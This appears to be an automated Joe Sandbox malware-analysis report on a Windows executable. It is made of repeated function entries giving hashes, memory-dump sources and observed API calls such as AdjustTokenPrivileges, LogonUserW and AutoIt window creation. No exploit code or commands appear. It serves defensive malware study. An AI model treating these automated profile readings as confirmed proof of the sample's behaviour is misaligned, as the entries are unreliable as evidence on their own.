Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54

Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0046889B

Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233

Strings

0eL, xrefs: 00468892

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eL
API String ID: 2893107130-3167399643
Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58

Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
FindClose.KERNEL32(00000000), ref: 0046C72B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85

Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
Opcode Fuzzy Hash: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6

Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
Opcode Fuzzy Hash: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18

Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99

Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208

Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185

Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F

Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60

Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88

Function 00E88C80 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

k^, xrefs: 00E88CD1

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: k^
API String ID: 0-1998660363
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 064161472a6c71b71f9576700c16895ec835d174730950781e27d188e2454bd7
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 37019678A01109EFCB44EF98C6909AEF7F5FB48310F608599DC09A7305D730AE41DB90

Function 00418808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A

Function 004221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624

Function 004225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624

Function 00574594 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction ID: 9b73fb6413c2de0e7a9154eaf4436e2265fe1c02b938a501d87519b57db06e1e
Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
Instruction Fuzzy Hash: FF310A32A092845BCF328E587808AB57FA8BBA3775F1DC156E45C8B1A2D3219C44FE61

Function 00E88DF0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 6c708f9e20c88803ac86e286b9a2ca2afb1184adefa9d3ba475ada5300bd511f
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: FA41B371D1051CEBCF48CFADC991AEEBBF2AF88201F948299D516AB345D730AB41DB50

Function 00E88CE0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 7d21c948ec64eb0fe8257dabd8abf86f51b01902a4d2088751cbe17b91760562
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: D7018078A00209EFCB44EF98C6909AEF7B5FB58310B608599EC09A7341E730AE41DB80

Function 00E87650 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00477806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0047785B
DeleteObject.GDI32(00000000), ref: 0047786D
DestroyWindow.USER32 ref: 0047787B
GetDesktopWindow.USER32 ref: 00477895
GetWindowRect.USER32(00000000), ref: 0047789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
GetClientRect.USER32(00000000,?), ref: 00477A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
GlobalLock.KERNEL32(00000000), ref: 00477AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
GlobalFree.KERNEL32(00000000), ref: 00477AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
GlobalFree.KERNEL32(00000000), ref: 00477B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A

Strings

DISPLAY, xrefs: 00477BDD
AutoIt v3, xrefs: 00477A2D
static, xrefs: 00477A75, 00477BCC
, xrefs: 00477D00

Memory Dump Source

